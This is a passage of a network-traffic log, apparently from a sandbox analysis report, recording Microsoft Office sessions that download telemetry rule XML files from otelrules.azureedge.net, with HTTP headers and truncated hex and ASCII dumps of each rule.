                2024-10-07 01:27:02 UTC1391INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S


                Session IDSource IPSource PortDestination IPDestination Port
                112192.168.2.44985913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:02 UTC192OUTGET /rules/rule702800v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:02 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:02 GMT
                Content-Type: text/xml
                Content-Length: 1354
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:45 GMT
                ETag: "0x8DC582BE0662D7C"
                x-ms-request-id: d4fd285a-d01e-005a-06ed-167fd9000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012702Z-1657d5bbd48cpbzgkvtewk0wu000000002tg00000000ppk2
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:02 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                Session IDSource IPSource PortDestination IPDestination Port
                113192.168.2.44986213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:03 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:03 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:03 GMT
                Content-Type: text/xml
                Content-Length: 1399
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                ETag: "0x8DC582BE8C605FF"
                x-ms-request-id: 76dbcc6a-501e-0035-36ed-16c923000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012703Z-1657d5bbd48cpbzgkvtewk0wu000000002s000000000uw9x
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:03 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                Session IDSource IPSource PortDestination IPDestination Port
                114192.168.2.44986013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:03 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:03 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:03 GMT
                Content-Type: text/xml
                Content-Length: 1403
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                ETag: "0x8DC582BDCDD6400"
                x-ms-request-id: 4d5cca78-701e-0021-6ae5-163d45000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012703Z-1657d5bbd48p2j6x2quer0q028000000030000000000b0nx
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:03 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                Session IDSource IPSource PortDestination IPDestination Port
                115192.168.2.44986113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:03 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:03 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:03 GMT
                Content-Type: text/xml
                Content-Length: 1366
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                ETag: "0x8DC582BDF1E2608"
                x-ms-request-id: c9f5ea47-201e-0071-33fe-16ff15000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012703Z-1657d5bbd48dfrdj7px744zp8s00000002d000000000w1fe
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:03 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                Session IDSource IPSource PortDestination IPDestination Port
                116192.168.2.44986313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:03 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:03 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:03 GMT
                Content-Type: text/xml
                Content-Length: 1362
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                ETag: "0x8DC582BDF497570"
                x-ms-request-id: 838d785c-001e-0014-24fe-165151000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012703Z-1657d5bbd48wd55zet5pcra0cg00000002v0000000003c0z
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:03 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                117192.168.2.44986413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:03 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:03 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:03 GMT
                Content-Type: text/xml
                Content-Length: 1403
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                ETag: "0x8DC582BDC2EEE03"
                x-ms-request-id: 4d8e5842-701e-0021-0efe-163d45000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012703Z-1657d5bbd48vhs7r2p1ky7cs5w0000000340000000009rv6
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:03 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                Session IDSource IPSource PortDestination IPDestination Port
                118192.168.2.44986513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:03 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:03 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:03 GMT
                Content-Type: text/xml
                Content-Length: 1366
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                ETag: "0x8DC582BEA414B16"
                x-ms-request-id: 8a56303a-c01e-0066-0f01-17a1ec000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012703Z-1657d5bbd48qjg85buwfdynm5w00000002t000000000rg1c
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:03 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                Session IDSource IPSource PortDestination IPDestination Port
                119192.168.2.44986813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:03 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:03 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:03 GMT
                Content-Type: text/xml
                Content-Length: 1403
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                ETag: "0x8DC582BEB866CDB"
                x-ms-request-id: d3a3eb01-b01e-003d-1ef1-16d32c000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012703Z-1657d5bbd4824mj9d6vp65b6n400000002wg00000000u7cy
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:03 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                Session IDSource IPSource PortDestination IPDestination Port
                120192.168.2.44986713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:03 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:03 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:03 GMT
                Content-Type: text/xml
                Content-Length: 1362
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                ETag: "0x8DC582BEB256F43"
                x-ms-request-id: 0c184816-a01e-000d-72ff-16d1ea000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012703Z-1657d5bbd48lknvp09v995n79000000002dg00000000c39x
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:03 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                Session IDSource IPSource PortDestination IPDestination Port
                121192.168.2.44986613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:03 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:04 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:03 GMT
                Content-Type: text/xml
                Content-Length: 1399
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                ETag: "0x8DC582BE1CC18CD"
                x-ms-request-id: cd0b82ba-d01e-0049-1304-17e7dc000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012703Z-1657d5bbd487nf59mzf5b3gk8n000000029g00000000v3us
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:27:04 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                Session IDSource IPSource PortDestination IPDestination Port
                122192.168.2.44986913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:27:04 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:27:04 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:27:04 GMT
                Content-Type: text/xml
                Content-Length: 1366
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                ETag: "0x8DC582BE5B7B174"
                x-ms-request-id: ca2bab4f-201e-0071-5e14-17ff15000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012704Z-1657d5bbd48qjg85buwfdynm5w00000002u000000000p92y
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
